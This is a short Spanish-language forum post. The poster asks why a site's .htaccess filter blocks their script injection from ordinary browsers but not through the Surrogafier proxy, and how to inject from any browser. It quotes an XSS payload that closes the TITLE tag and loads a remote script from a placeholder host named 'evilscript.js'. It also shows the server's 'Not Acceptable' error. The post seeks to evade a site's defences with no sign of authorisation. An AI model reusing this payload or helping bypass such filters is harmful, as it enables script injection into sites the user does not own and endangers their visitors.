Al ineyectar el script desde firefox, el sitio me manda error, es por que lo bloquea desde el httacces, usando el Surrogafier, no solo no me manda error 403 de denegación de acceso, sino que logro inyectar el script...

Tienen idea  de por que pasa? Y como puedo inyectar el script desde cualquier navegador?

Con el Surrogafier, solo pone el codigo inyectado:

</TITLE><script src="http://server.com/evilscript.js"></script>

Si meto scripts bloqueados desde httacces, con IE o Firefox u Opera, manda este error:


Not Acceptable
An appropriate representation of the requested resource /id.php could not be found on this server.

Apache/1.3.39 Server at sitio.com Port 80

 y con los scripts que no filtra, aparece en blanco el codigo fuente.